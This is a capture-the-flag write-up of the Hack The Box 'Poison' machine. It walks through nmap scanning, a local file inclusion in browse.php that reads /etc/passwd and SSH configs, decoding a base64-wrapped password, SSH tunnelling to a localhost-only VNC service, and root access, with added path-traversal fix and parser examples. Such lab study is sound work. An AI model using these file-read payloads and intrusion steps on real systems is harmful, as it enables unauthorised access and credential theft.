HTB Poison

Enumeration

nmap all ports, full enumerate

nmap -p- -sV -A <ip> --open -o full-enumerate.nmap

└─$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 20:24 EDT
Nmap scan report for 10.129.1.254
Host is up (0.035s latency).
Not shown: 55577 filtered tcp ports (no-response), 9956 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.96 seconds

nmap (all identified TCP ports + default scripts & service versions)

nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap

└─$ nmap -p 22,80 -sV --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 20:26 EDT
Nmap scan report for 10.129.1.254
Host is up (0.027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
| http-headers: 
|   Date: Thu, 20 Jul 2023 00:27:02 GMT
|   Server: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|   X-Powered-By: PHP/5.6.32
|   Connection: close
|   Content-Type: text/html; charset=UTF-8
|   
|_  (Request type: HEAD)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds

nmap (vuln scan)

nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap

└─$ nmap -p 22,80 --script vuln $IP -o vuln.nmap                                                               
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 20:27 EDT
Nmap scan report for 10.129.1.254
Host is up (0.024s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.1.254
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.129.1.254:80/
|     Form id: 
|_    Form action: /browse.php
| http-enum: 
|   /info.php: Possible information file
|_  /phpinfo.php: Possible information file
| http-sql-injection: 
|   Possible sqli for forms:
|     Form at path: /, form's action: /browse.php. Fields that might be vulnerable:
|_      file
|_http-dombased-xss: Couldn't find any DOM based XSS.

Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds

Port Enumeration

Port 80

  1. The site root shows us this:

    [screenshot]

  2. Placing a ' seems to break the application. Possible SQL injection?

    [screenshot]

  3. But let's look at every file first.

LFI

  1. listfiles.php exposed pwdbackup.txt.
  2. Found an LFI: http://10.129.1.254/browse.php?file=/etc/passwd. I was just thinking maybe I could read files, and it worked; the username charix is in passwd here. Other files read the same way:
    1. http://10.129.1.254/browse.php?file=/etc/group
    2. http://10.129.1.254/browse.php?file=/etc/ssh/ssh_config
    3. http://10.129.1.254/browse.php?file=/etc/ssh/sshd_config
  3. So I went back to /pwdbackup.txt and decoded it with a python script:

import base64

# The base64 blob from pwdbackup.txt goes here (its value is elided on this page).
encoded_string = "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"

# Peel off one base64 layer per iteration; b64decode accepts either str or bytes.
decoded_string = encoded_string
for _ in range(13):
    decoded_string = base64.b64decode(decoded_string)

print(decoded_string.decode('utf-8'))

    1. Did range(13) because pwdbackup.txt said "This password is secure, it's encoded atleast 13 times.. what could go wrong really..".
    2. Ran it and got an interesting password:

    [screenshot]

    3. I just assumed "Charix" was the username, and I was right. It is also in the /etc/passwd we read through the LFI earlier, and the password is the base64-decoded output. ssh charix@<ip> got us in.
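The range(13) trick only works because the backup file announced its layer count. The added example below (not part of the original write-up) generalises the author's script: it keeps stripping base64 layers until strict decoding fails or the result stops being printable text, so it needs no advance knowledge of the depth. The blob it unwraps is constructed here by wrapping a made-up password 13 times; the real pwdbackup.txt value is not reproduced. The wider point for anyone "backing up" a password this way: base64 is an encoding, not encryption, and any number of layers unwinds in milliseconds.

```python
import base64
import binascii


def encode_layers(data: bytes, layers: int) -> bytes:
    """Wrap data in `layers` rounds of base64 (used only to build the sample)."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


def _looks_textual(data: bytes) -> bool:
    """True if data is printable UTF-8 text, i.e. still a candidate base64 layer
    or a readable final payload; random binary means we decoded one step too far."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def unwrap_base64(blob: bytes, max_layers: int = 64) -> tuple[bytes, int]:
    """Strip nested base64 layers and return (innermost payload, layers removed).

    Unlike a fixed range(13), this stops on its own: when strict decoding fails
    (characters outside the base64 alphabet, bad padding) or when the decoded
    bytes are no longer printable text, the current value is the payload.
    """
    current = blob
    layers = 0
    while layers < max_layers:
        compact = b"".join(current.split())  # tolerate line-wrapped blobs
        try:
            nxt = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            break
        if not nxt or not _looks_textual(nxt):
            break
        current = nxt
        layers += 1
    return current, layers


# Constructed sample, standing in for the pwdbackup.txt blob: a made-up
# password wrapped 13 times, as the backup file on the box claims to be.
SAMPLE_PASSWORD = b"constructed-sample-passw0rd!"
SAMPLE_BLOB = encode_layers(SAMPLE_PASSWORD, 13)


if __name__ == "__main__":
    payload, depth = unwrap_base64(SAMPLE_BLOB)
    print(f"removed {depth} layers -> {payload.decode()}")
```

The printable-text check matters for the edge case where the final plaintext happens to be valid base64 itself (for example a short alphanumeric password): decoding it one more time yields binary garbage, which the check catches, so the plaintext is returned intact.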
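The browse.php?file= parameter is the root cause of everything that follows, so here is the fix pattern, as an added example that is not the box's PHP code (browse.php's source is not shown in this write-up) and is written in Python rather than PHP. The unsafe reader joins the user value straight onto the document root, which is the behaviour observed above: "../" walks out of the root and an absolute path replaces it. The hardened reader resolves the joined path first and then checks that the real target still lies under the root. The directory layout, file names and contents are constructed for the demo.

```python
import tempfile
from pathlib import Path


class ForbiddenPath(ValueError):
    """Raised when a requested file resolves outside the served directory."""


def read_file_unsafe(web_root: Path, requested: str) -> str:
    # Vulnerable pattern (the shape browse.php?file=... behaves like): the
    # user-controlled value is joined straight onto the document root. '..'
    # segments walk out of it, and an absolute path replaces it entirely.
    return (Path(web_root) / requested).read_text()


def read_file_safe(web_root: Path, requested: str) -> str:
    base = Path(web_root).resolve()
    # Join, then resolve: this normalises '..', symlinks and absolute paths
    # before the containment check, so the check sees the real target.
    candidate = (base / requested).resolve()
    if candidate != base and base not in candidate.parents:
        raise ForbiddenPath(f"{requested!r} resolves outside {base}")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate.read_text()


def is_rejected(web_root: Path, requested: str) -> bool:
    """Convenience wrapper: True when the hardened reader refuses the path."""
    try:
        read_file_safe(web_root, requested)
    except ForbiddenPath:
        return True
    return False


# Constructed layout: a document root with one legitimate page, and a sibling
# directory outside the root holding a file the web app must never serve.
WELCOME_CONTENT = "constructed welcome page\n"
OUTSIDE_CONTENT = "constructed backup file, should never be reachable\n"


def build_demo_tree() -> Path:
    """Create the throwaway layout above and return the document root."""
    top = Path(tempfile.mkdtemp(prefix="lfi-demo-"))
    root = top / "htdocs"
    root.mkdir()
    (root / "welcome.txt").write_text(WELCOME_CONTENT)
    outside = top / "outside"
    outside.mkdir()
    (outside / "backup.txt").write_text(OUTSIDE_CONTENT)
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    print("unsafe, ../outside/backup.txt ->", read_file_unsafe(root, "../outside/backup.txt").strip())
    print("safe,   ../outside/backup.txt ->", "rejected" if is_rejected(root, "../outside/backup.txt") else "served")
    print("safe,   welcome.txt           ->", read_file_safe(root, "welcome.txt").strip())
```

The order of operations is the whole point: checking the string for "../" and then opening it is bypassable (encoding tricks, symlinks, absolute paths), whereas resolving first and comparing the canonical result against the canonical root is not. In PHP the equivalent primitives are realpath() on both sides plus a prefix comparison; an allowlist of servable names is stricter still where the set of files is known.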

Root

  1. An ls -la shows that secret.zip is owned by root with group owner charix, and trying to unzip it gives us a password prompt.

    [screenshot]

  2. So I downloaded it to my host machine to try and crack it: scp charix@10.129.1.254:/home/charix/secret.zip ~/Lab/HTB/Poison

    1. zip2john secret.zip > key
    2. john --format=pkzip key
    3. didn't get anything out of it
    4. tried unzip secret.zip and used Charix!2#4%6&8(0, which unzipped it and gave me a weird file I cannot humanly read
  3. tried ps aux and this caught my attention:

    [screenshot]

Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
  1. VNC is running on these ports; to confirm: netstat -a

    [screenshot]

  2. Since it's bound to localhost only, we need to port forward from the host machine to the target machine:

    1. ssh -D 1080 -L6801:127.0.0.1:5801 -L6901:127.0.0.1:5901 charix@10.129.1.254
    2. What this says: -L makes SSH listen on my box (ports 6801 and 6901) and forward that traffic to 127.0.0.1:5801 and 127.0.0.1:5901 on the target.
    3. -D is dynamic port forwarding: SSH acts as a SOCKS proxy server, and SOCKS-aware applications send their traffic through it. Port 1080 is used for this, as defined in proxychains.conf. So we use proxychains to specify:

    [screenshot]

  3. We do indeed have a connection:

    [screenshot]

  4. Tried authenticating with vncviewer 127.0.0.1:6901 and got prompted for a password. Maybe that secret file can be used now?

  5. vncviewer -passwd secret 127.0.0.1:6901 worked and gave us a session as root.

    [screenshot]

  6. Then I copied the flag so I could read it as charix over ssh: cp /root/root.txt /home/charix/root.txt; chown charix /home/charix/root.txt
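The -L syntax in step 2 is easy to misread, so here is an added parser (not part of the original write-up) that pulls every -L and -D forward out of an ssh command line and states what each one does. It accepts the attached form used above (-L6801:...) and the separated form (-L 6801:...), plus the optional bind address in [bind_address:]port:host:hostport; the default bind of "localhost" reflects ssh's behaviour when GatewayPorts is off. The host:port on the right is resolved from the SSH server's side, which is exactly why 127.0.0.1:5901 reaches the target's localhost-only Xvnc. The defender's takeaway: binding a service to 127.0.0.1 limits network exposure, but it is not an access control against anyone who already has a shell on the box. The command parsed in the demo is the one from the write-up; the extra test inputs are constructed.

```python
import shlex
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Forward:
    kind: str                # "local" for -L, "dynamic" for -D
    bind: str                # client-side address the listener binds to
    port: int                # client-side listening port
    target: Optional[str]    # "host:port" as seen from the SSH server; None for -D

    def describe(self) -> str:
        if self.kind == "dynamic":
            return (f"-D: SOCKS proxy on {self.bind}:{self.port}; each client "
                    f"connection names its own destination, reached from the server")
        return (f"-L: listen on {self.bind}:{self.port} here, forward to "
                f"{self.target} as the SSH server sees it")


def _split_spec(spec: str, needs_target: bool):
    """Parse [bind_address:]port[:host:hostport]. ssh binds to the loopback
    address when no bind_address is given (GatewayPorts defaults to no)."""
    parts = spec.split(":")
    if needs_target:
        if len(parts) == 3:
            bind, port, host, hostport = "localhost", *parts
        elif len(parts) == 4:
            bind, port, host, hostport = parts
        else:
            raise ValueError(f"unsupported -L spec {spec!r}")
        return bind, int(port), f"{host}:{hostport}"
    if len(parts) == 1:
        return "localhost", int(parts[0]), None
    if len(parts) == 2:
        return parts[0], int(parts[1]), None
    raise ValueError(f"unsupported -D spec {spec!r}")


def parse_forwards(command: str) -> list:
    """Extract every -L and -D forward from an ssh command line, accepting both
    the attached (-L6801:...) and separated (-L 6801:...) spellings."""
    argv = shlex.split(command)
    forwards = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-L", "-D"):
            flag, spec, i = arg, argv[i + 1], i + 2
        elif arg[:2] in ("-L", "-D") and len(arg) > 2:
            flag, spec, i = arg[:2], arg[2:], i + 1
        else:
            i += 1
            continue
        bind, port, target = _split_spec(spec, needs_target=(flag == "-L"))
        forwards.append(Forward("local" if flag == "-L" else "dynamic", bind, port, target))
    return forwards


# The exact command used in the write-up above.
WRITEUP_COMMAND = "ssh -D 1080 -L6801:127.0.0.1:5801 -L6901:127.0.0.1:5901 charix@10.129.1.254"

if __name__ == "__main__":
    for fwd in parse_forwards(WRITEUP_COMMAND):
        print(fwd.describe())
```

Unix-socket forwards (the path forms of -L) are deliberately not handled; for TCP forwards the parser covers both the two-part and the four-part spellings.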


Useful resource links

https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc

Lessons Learned

  • Got some good base64 decoding in
  • Routing/forwarding was really cool to see here
  • ps aux showing the Xvnc process bound to localhost
  • vncviewer to connect and see the root flag